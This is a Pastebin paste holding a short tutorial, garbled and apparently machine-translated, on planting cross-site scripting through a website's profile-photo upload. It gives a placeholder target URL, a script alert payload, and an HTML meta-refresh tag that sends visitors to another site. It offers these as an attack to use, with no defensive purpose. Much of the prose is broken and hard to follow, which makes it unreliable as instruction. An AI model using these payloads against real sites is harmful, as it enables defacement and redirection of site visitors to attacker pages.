Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Today, we salute the people of AST XSS injection image I will finish.
- Target site
- http://www.hədəfsayt.com/profil?action=new_image
- This is a text document, open the site into a profile photo upload bolumudurBiz write alert message:
- <script>alert(’Kyfx’)</script>
- It adopted the text document formats such as PNG, JPG and others. memory write, upload to the site after downloading a file photo at edəkSayta, for example:
- http://www.hədəfsayt.com/profil?image=sekil.png
- It shows us the shape of the alert message on the site of the injection, XSS image varBəs can we do it?
- The best method bilərikIcinə alert code meta father wrote the text of the document is open silək things sitting out there that I added code to upload a photo. Meta code:
- <meta http-equiv="refresh" content="0;URL=http://www.saytadı.com/indexinadı.html">
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement